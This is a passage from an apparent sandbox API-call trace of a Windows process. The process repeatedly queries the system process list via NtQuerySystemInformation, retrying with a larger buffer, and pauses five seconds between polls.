returned 0x0 [0226.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.912] NtQuerySystemInformation (in: 